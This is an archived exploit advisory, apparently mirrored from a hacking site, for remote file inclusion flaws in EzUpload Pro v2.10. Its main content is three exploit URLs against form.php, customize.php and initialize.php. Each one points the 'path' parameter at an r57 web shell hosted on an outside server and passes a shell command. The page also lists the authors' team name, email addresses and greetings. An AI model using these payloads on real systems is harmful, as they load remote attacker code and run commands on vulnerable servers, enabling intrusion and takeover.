AOH :: HP Unsorted E :: B06-2568.HTM

Ezupload pro v2.10 multiple file include exploits



multiple file include exploits in EzUpload Pro v2.10
multiple file include exploits in EzUpload Pro v2.10



multiple file include exploits in EzUpload Pro v2.10

forum type : EzUpload Pro v2.10
bug found by : black-code & sweet-devil
team : site-down
type : file include

####################################################
exploits :


form.php

http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

customize.php

http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

initialize.php

http://www.example.com/arab3upload/initialize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd

####################################################

path to admin login:

#######################
emails:

black-cod3@hotmail.com & gamr-14@hotmail.com
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.